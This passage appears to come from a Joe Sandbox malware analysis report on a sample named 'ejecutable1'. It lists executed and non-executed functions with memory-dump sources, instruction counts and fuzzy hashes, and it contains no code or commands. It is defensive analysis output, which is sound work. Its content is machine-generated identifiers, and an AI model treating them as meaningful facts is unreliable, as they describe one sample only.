                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3acffc100928a4da7c571b3c49d438d34e6b07555fd595e42b9687885580258c
                                                                    • Instruction ID: 0212af2ccc31c213dd5dc09098ac537d41dcb32c3d3f2d82deaf36ac0783d267
                                                                    • Opcode Fuzzy Hash: 3acffc100928a4da7c571b3c49d438d34e6b07555fd595e42b9687885580258c
                                                                    • Instruction Fuzzy Hash: B621C275604208EFDB15DF60E9C4B26BBB5FF84314F24C9A9E84E4B246C336D847CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f8a2afec85db30593ed402b97664c6ebc74f15f1f07b91588eae24285e826690
                                                                    • Instruction ID: b473ec78adba145033f6fc4c21941d30c6981b54e8da0b0ca5c00cc64e38045f
                                                                    • Opcode Fuzzy Hash: f8a2afec85db30593ed402b97664c6ebc74f15f1f07b91588eae24285e826690
                                                                    • Instruction Fuzzy Hash: 0F21C275604248DFDB14DF64E984B16BB75FF84314F24C9A9E84E4B246C336D847CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00276031, Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6342aebbefa6268f8c232cd1d0ccd2eb2afc3782d0cbdc3c48a650ef213a88e
                                                                    • Instruction ID: d6577d01e8d61a01b555b56b461619a167ec3a7858ea3829d7d6c7484b0c7ef0
                                                                    • Opcode Fuzzy Hash: f6342aebbefa6268f8c232cd1d0ccd2eb2afc3782d0cbdc3c48a650ef213a88e
                                                                    • Instruction Fuzzy Hash: A4310678D042098FCB04CFA5D8455EEBBB6FF89310F10846AD904B7361DB341995CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002703E8, Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7427ac48c7714958a65ad0c5737bd68e76c1f01dc68c13695502d4c4e4d0d7a
                                                                    • Instruction ID: dfccb241d2252dca41963e20de6c4941af514c14cdcb88ba1e18e3f1e1045797
                                                                    • Opcode Fuzzy Hash: c7427ac48c7714958a65ad0c5737bd68e76c1f01dc68c13695502d4c4e4d0d7a
                                                                    • Instruction Fuzzy Hash: 7C21F378E102099BCB04DFA5D8889EEBBB6FF88310F10842AD919B3350DB345991CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027F5C0, Relevance: .1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0462a45a681fdad9cc90d29301b6cf2327ecdaf14464b5ad2d841fbca4458a21
                                                                    • Instruction ID: c31f90de6117b1d9121557d08bb47c28c21c5e3990d4fcb856e355d35fe629ac
                                                                    • Opcode Fuzzy Hash: 0462a45a681fdad9cc90d29301b6cf2327ecdaf14464b5ad2d841fbca4458a21
                                                                    • Instruction Fuzzy Hash: 9021F334E142098BDB04DFA5D9056EEBBF6EF89300F14846AD419A7261EB345A51CFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffed2e78bcc5e198d6b2c2fdec07d241800434202eba1f8a8a2a8b73ced0c56b
                                                                    • Instruction ID: 4a0e3a24c95d5cf0cef253fd5f6bd795b5b4c3ba7800a1057e6fc601cd4ec31e
                                                                    • Opcode Fuzzy Hash: ffed2e78bcc5e198d6b2c2fdec07d241800434202eba1f8a8a2a8b73ced0c56b
                                                                    • Instruction Fuzzy Hash: 74215B755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0017D1CF, Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc67c3a9fbf8d8e039c43f99312ce4261974722c27e4e0709c7fa083e3c21303
                                                                    • Instruction ID: 4972bf452d951ac56e769b7b85863f6adb19bd1a897604cdd32f34aaf97b1f14
                                                                    • Opcode Fuzzy Hash: dc67c3a9fbf8d8e039c43f99312ce4261974722c27e4e0709c7fa083e3c21303
                                                                    • Instruction Fuzzy Hash: 84118B75544284DFCB12CF10E5C4B15BFB1FF85314F28C6A9D8494B656C33AD84ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027F740, Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85abe972481684fd84bba7942813abac1531a19122cf54fe2080a5f52b18a2a2
                                                                    • Instruction ID: c5088ce036fa5b9d9f05a8d35dd05337493cc0d9b10c1011d866087980f65ce0
                                                                    • Opcode Fuzzy Hash: 85abe972481684fd84bba7942813abac1531a19122cf54fe2080a5f52b18a2a2
                                                                    • Instruction Fuzzy Hash: B3110670D1824A9FDB98CFBA89402AEFBF5AB49300F15D1AAD40CE6211E7345A91CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0016D1C1, Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405747374.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_16d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54dfd2180eb03c618761345114cdf492081c2fe512380c8c0ffe715ce1151c4d
                                                                    • Instruction ID: 2a5ea10302089ae5731f693d60e9aaf32af82080d82a2dd3955a0224207da51e
                                                                    • Opcode Fuzzy Hash: 54dfd2180eb03c618761345114cdf492081c2fe512380c8c0ffe715ce1151c4d
                                                                    • Instruction Fuzzy Hash: 6501DB31A083549BDB144A65ECC4BABBFDCEF51324F14C56AED451B282C374DC50CAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027DE21, Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e74a230923c9f7267e6bf80c025e96a1d1ad3cc872461a78dc6545299a3ac76
                                                                    • Instruction ID: 06a51ac146573e7fa056556da0969c711b445e3a7fa5d7c5278d841173f06b22
                                                                    • Opcode Fuzzy Hash: 5e74a230923c9f7267e6bf80c025e96a1d1ad3cc872461a78dc6545299a3ac76
                                                                    • Instruction Fuzzy Hash: F61150B8D1412ACBCB61CF54D940BE8BBB0AF68350F1080E5995EA7600E6B05AD09F54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002703D8, Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0fc643665fcbda5ffe8c1515dec9d2dfea6c0a6e404d49fffdd81c236c2c0eb3
                                                                    • Instruction ID: 200629fcc2e34e185567d3c2880b5404e9cdfa940d2785d1fd88ad26a1e759e6
                                                                    • Opcode Fuzzy Hash: 0fc643665fcbda5ffe8c1515dec9d2dfea6c0a6e404d49fffdd81c236c2c0eb3
                                                                    • Instruction Fuzzy Hash: 5101E5B4D1520A9FCB44DFA8C5859AEBBF5EF48304F20886AD908A3350D7705A50CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0016D1C0, Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405747374.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_16d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: daffb4bb4fe1d42fc2144d5c752a859e73da56b9bccc0dd68eebeb38ea094f2c
                                                                    • Instruction ID: 06d179cfe5e3be339b6e5d9a79c096da627c1c936fd90fc218c72e9cd9c8ca1b
                                                                    • Opcode Fuzzy Hash: daffb4bb4fe1d42fc2144d5c752a859e73da56b9bccc0dd68eebeb38ea094f2c
                                                                    • Instruction Fuzzy Hash: 83F04F72504254ABEB108A15DCC8B66FF98EB91724F28C55AED485B282C3789844CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00275C2C, Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffda6e69d75252b740fcf01fa18ee79a39798f2da39a53ce938f28b49132cf7a
                                                                    • Instruction ID: da1a98d1c6f4caa71838a5992b266eac6f6df3dc235eb09d39817747210ac9aa
                                                                    • Opcode Fuzzy Hash: ffda6e69d75252b740fcf01fa18ee79a39798f2da39a53ce938f28b49132cf7a
                                                                    • Instruction Fuzzy Hash: 05F049B4E091199FCB00CFA8C9958AEBBF1FF49300B14859AD809AB360D7709E41DB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00279068, Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6082156762e231e125161cb94fe4c00171586036eb45503886a8966a4935258
                                                                    • Instruction ID: cdfeea38db0247f075174a2ded01a6d6c452f2eb407a72a3693d27e43940e960
                                                                    • Opcode Fuzzy Hash: b6082156762e231e125161cb94fe4c00171586036eb45503886a8966a4935258
                                                                    • Instruction Fuzzy Hash: 30F01730E24349AEEB54EFF9980569DFBF8EB48300F10C0AA990C92211EB349994CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00270439, Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18cfc969260f4c9798305803e03e94ccbc740da1cfc44dcd95b03f14ce30d3fd
                                                                    • Instruction ID: 899d8d7bbff3165af26693cf36119a9f9a27914eb5d62a511ed8b40ef6507c97
                                                                    • Opcode Fuzzy Hash: 18cfc969260f4c9798305803e03e94ccbc740da1cfc44dcd95b03f14ce30d3fd
                                                                    • Instruction Fuzzy Hash: D5F0A030961208DFCB45EFB48868ABE77B4EF12304F1159ADD40DA3262DF318E64CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027F4D0, Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1827fdd43c85e4713073eb03626adc3170a7e17759c2af589eac99efd1c0fa60
                                                                    • Instruction ID: fc4e80df3149d9d5ed496ea078e87cb7e29cd06016b52148753fe5ddaecde0b0
                                                                    • Opcode Fuzzy Hash: 1827fdd43c85e4713073eb03626adc3170a7e17759c2af589eac99efd1c0fa60
                                                                    • Instruction Fuzzy Hash: 07F03430D242099FCB94DFBAC64429EBBF8AB44304F44C0BA891CD2211E7349A508F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00270498, Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9f0173f646c27465c1df9a78e0c7a33b5a55b45641b1568635acf44bf12f6c5
                                                                    • Instruction ID: ec54cf7b0bf53ef678b1da4a2f1e2acada8ab625b6f875d25f53353c89be61b3
                                                                    • Opcode Fuzzy Hash: d9f0173f646c27465c1df9a78e0c7a33b5a55b45641b1568635acf44bf12f6c5
                                                                    • Instruction Fuzzy Hash: D7F03070955284CFC716DFB8D844AA8BBB59F57211F0540EAD0089B272DB304D54DB20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00270448, Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3245ea04e64392b6d07eb45eb86f543f5b58006337d48921b245f20519ccdb3c
                                                                    • Instruction ID: 67eef358110b1be60a150b909bbe1a8a7d11e5ed9e87632804096eccb6200b3e
                                                                    • Opcode Fuzzy Hash: 3245ea04e64392b6d07eb45eb86f543f5b58006337d48921b245f20519ccdb3c
                                                                    • Instruction Fuzzy Hash: FBE0DF30951208DBCB44FFF0CC59A6EB3B8DB02208F1058ACC40DA3352CF318EA0DA94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002700E0, Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d37aff91922cccdcd082117186561c781290c13b3f82bcfd66beb76030b957bd
                                                                    • Instruction ID: d1aee328e90f7c8fa64b6792f10b450ab31682459ff1d472d781ef17e05d8d28
                                                                    • Opcode Fuzzy Hash: d37aff91922cccdcd082117186561c781290c13b3f82bcfd66beb76030b957bd
                                                                    • Instruction Fuzzy Hash: 55E0DF309A1108DBCB04DFA9C980BADF3FCEF46304F1084A8E40C63261DB309E54EA44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00276370, Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78d4ac6d85422f35b3389cf488b822769d0e96b3544893b4773665281f57ea55
                                                                    • Instruction ID: 995c259a6070406d8a4ade60a66b5ce2fee8c36ced18c742954ccb47905b4a4d
                                                                    • Opcode Fuzzy Hash: 78d4ac6d85422f35b3389cf488b822769d0e96b3544893b4773665281f57ea55
                                                                    • Instruction Fuzzy Hash: 88E01A3086920CEBC704DFA0D8096FDBB79BB46705F2091A9D84D27350CB705AA4DB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278F38, Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d452453148828ed17684f4395ce4f6bc8375ce133a8b0734e2e424ba47555f19
                                                                    • Instruction ID: 083d04b0f129bade7df43b54df8c6ceb68c95b3b2ba3c02ea8d2a6e6f0ab6cc7
                                                                    • Opcode Fuzzy Hash: d452453148828ed17684f4395ce4f6bc8375ce133a8b0734e2e424ba47555f19
                                                                    • Instruction Fuzzy Hash: E2E0DF30A65205CFD700DFB9890C3AAB7EEDB49305F40C8A5C40CD3610EF308D60CA52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278F88, Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0ba99e7c6ba8bc8e21c90dcbd4d69b01efa6268d960ad7694297ae5ca7df81a
                                                                    • Instruction ID: a75e32106fc443b6a44d2e0f7f3bba23184bca64382fe824246e6008a478a791
                                                                    • Opcode Fuzzy Hash: f0ba99e7c6ba8bc8e21c90dcbd4d69b01efa6268d960ad7694297ae5ca7df81a
                                                                    • Instruction Fuzzy Hash: 83E09A30564205CAD714DFBA980829AFAEE9B49306F50C4A9C40CC3620EB748D608A56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027697F, Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 367b0a0de19156c635be77e7ccdcffe45129dc3d033b80ca39eeb02074faaa29
                                                                    • Instruction ID: b53368462be15c51c86d12f3b93ff861eea8a528b2443b1a2655899dbf56d841
                                                                    • Opcode Fuzzy Hash: 367b0a0de19156c635be77e7ccdcffe45129dc3d033b80ca39eeb02074faaa29
                                                                    • Instruction Fuzzy Hash: 0EE06D30869248DECB01DFB4994869CBFF0AB85204F2445AECA0992351E7711A90CB06
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278F30, Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1feabf1c2956afc64c4a35f9ace3234e328ed442d1e5dbf86d13af769c666a57
                                                                    • Instruction ID: 2884374315be57f8774cf27c614fd3b4e0be686c2fb9aa8b964430804f44a303
                                                                    • Opcode Fuzzy Hash: 1feabf1c2956afc64c4a35f9ace3234e328ed442d1e5dbf86d13af769c666a57
                                                                    • Instruction Fuzzy Hash: F1D02B201B93458BC3108B749C0C63277CCD70A346F408DE5C40CC3102EFB48820CAA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00276990, Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff6020837ace5ca8a512dc0f16640d1668b701276baef419aa5ae8407d6aa415
                                                                    • Instruction ID: 513c10fba41987d103ee3f1d50097aa4ea475af58d0d426c23d9c0421f8f17f0
                                                                    • Opcode Fuzzy Hash: ff6020837ace5ca8a512dc0f16640d1668b701276baef419aa5ae8407d6aa415
                                                                    • Instruction Fuzzy Hash: 6EE0EC3096520CDFCB44DFB8D9496ACBBF8AB44301F2045A9CA0CA3350E7715A90DB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027A813, Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8e3342bb1e914a4d3b82dc3ac47f9b29ffbe484151dd76e4ad219f9e131e970
                                                                    • Instruction ID: 319ed51ec2e012812f6b89c1b784dd13aae0a3935d05c79cfd46cf4c96dfc8c2
                                                                    • Opcode Fuzzy Hash: b8e3342bb1e914a4d3b82dc3ac47f9b29ffbe484151dd76e4ad219f9e131e970
                                                                    • Instruction Fuzzy Hash: 35D06774D25229CBDB29CF20E840A98B7B4BB08390F1060DAE40EB3200D6701F90CF24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00DA5C18, Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: e98ebbed1603e787e295568fd236f5754fd50b3d6a865249aba30880f50754a2
                                                                    • Instruction ID: 68f10a8015e7a776105e171de3f936e9c98b227dcbded26bcb77c9b207f7d78e
                                                                    • Opcode Fuzzy Hash: e98ebbed1603e787e295568fd236f5754fd50b3d6a865249aba30880f50754a2
                                                                    • Instruction Fuzzy Hash: B822CF74E00618CFDB14CFA9D984AEDBBF2BF89314F2881A9E509A7255D7349D81CF24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002790C0, Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @2@m
                                                                    • API String ID: 0-1590027327
                                                                    • Opcode ID: 6d212733cd2174893b6166604e128a2e224ee47fcf3b8f7a9babf19171db2174
                                                                    • Instruction ID: c37c3cb29495282e6e12b882b73837e985de17f7d55d6279c2d98b08a01211f9
                                                                    • Opcode Fuzzy Hash: 6d212733cd2174893b6166604e128a2e224ee47fcf3b8f7a9babf19171db2174
                                                                    • Instruction Fuzzy Hash: 54516C70A10309CFDB44EFB9E840A9EBBF3EB85304F05C939E009AB665DB745985CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002790D0, Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @2@m
                                                                    • API String ID: 0-1590027327
                                                                    • Opcode ID: 57f0863b4817e97aa375de299b71d8cf63f5ed528bec36f3fe614d42aeb89dc0
                                                                    • Instruction ID: 3d3697cf60ac141dbab5ab4a1d2ea5f239cd15ed0e1b275c32d9b28234379622
                                                                    • Opcode Fuzzy Hash: 57f0863b4817e97aa375de299b71d8cf63f5ed528bec36f3fe614d42aeb89dc0
                                                                    • Instruction Fuzzy Hash: 76515D70A10309CFDB44EFB9E840A9EBBF3EB85304F04C939E009AB665DB745995CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027A44B, Relevance: .2, Instructions: 207COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a073397d01b2d21fefef67af369481852a9516d2cba91214fb4c92c171a0e3e1
                                                                    • Instruction ID: a89cec05d12a0182459d6b0384895af3af914d2f32a523ec803f6b4735d1246d
                                                                    • Opcode Fuzzy Hash: a073397d01b2d21fefef67af369481852a9516d2cba91214fb4c92c171a0e3e1
                                                                    • Instruction Fuzzy Hash: D2B17DB0E146288BDBA4DF29C9847CDBBF1BF89305F5085D9D18CA6205EB309E99CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA0012, Relevance: .1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
